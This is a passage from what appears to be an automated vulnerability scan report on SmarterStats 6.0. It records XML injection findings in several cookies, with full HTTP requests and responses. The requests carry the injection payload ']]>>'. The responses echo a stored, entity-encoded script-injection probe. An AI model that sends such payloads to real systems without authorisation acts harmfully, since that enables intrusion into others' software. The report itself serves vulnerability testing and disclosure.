Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott]]>>; SelectedLanguage=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserDataMining"}; STTTState=
Content-Length: 15

{"siteIds":[1]}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:37 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 726
Connection: Close

{"d":[{"__type":"SSWeb.Admin.frmSites+SiteStatusData","currently":"Gathering Statistics - Closing statistics processor","siteId":1,"status":"Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\\WebLogs\\1\\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"}]}

3.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The STHashCookie cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STHashCookie cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}]]>>; SelectedLanguage=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:04:55 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7086



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[ViewState value omitted]" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.6. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STTTState cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The STTTState cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STTTState cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=]]>>; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:04:04 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7086



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEzMzA1ODgwMQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgMPFgIeB1Zpc2libGVoZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBD2QWAgIBDxYCHgRUZXh0BbsEPGRpdiBjbGFzcz0iVGlwVGV4dEZhaWx1cmUiPkltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPjwvZGl2PmQCCA8WAh8CaGRkvhHdspcJKxLPz9qe3eyR5QNnEJr+H1LfcMEm11gTyGU=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [SelectedLanguage cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SelectedLanguage cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=]]>>; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:56 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7086



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [loginsettings cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The loginsettings cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the loginsettings cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott]]>>; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:45 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7086



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
